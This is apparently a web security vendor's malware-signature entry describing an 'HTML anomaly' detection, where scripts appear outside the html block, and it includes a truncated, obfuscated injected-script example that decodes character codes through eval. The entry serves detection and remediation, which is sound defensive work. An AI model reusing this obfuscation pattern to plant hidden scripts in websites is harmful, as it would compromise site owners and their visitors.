Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: warning.html_anomaly

Description: We detected anomaly in HTML code placement. Typical anomalies are placement of scripts and iframes outside of the <html>..</html> block, which means that it was don't by someone who is not familiar with the web page generation process of this particular site (massive automated infection) or simply doesn't have access to the code that generates webpages (for example, server-level infections that append malware to every server response). This is a strong signal that a stranger tried to modify web pages.

Example

...
</html><script>Object.prototype.​tes=-​2;var s;aa =document.​createTextNode("harC"+"ode");s=String["fr"+"omC"+aa[​'nod'+'eVa'+"lue"]];for(i in{​})if(i=='t'+'es')h={}[i];eval​(s(7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,...skipped...57-h,7-h,7-h,123-h)​);</script>

In rare cases, webmasters with little experience with HTML put scripts outside of the <html>..</html> block. If you see this warning for the scripts that you placed on your site yourself, just move them inside the <html>..</html> block - this should be a really easy fix for someone who controls the site.



Affecting: Any web site (no specific target).

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb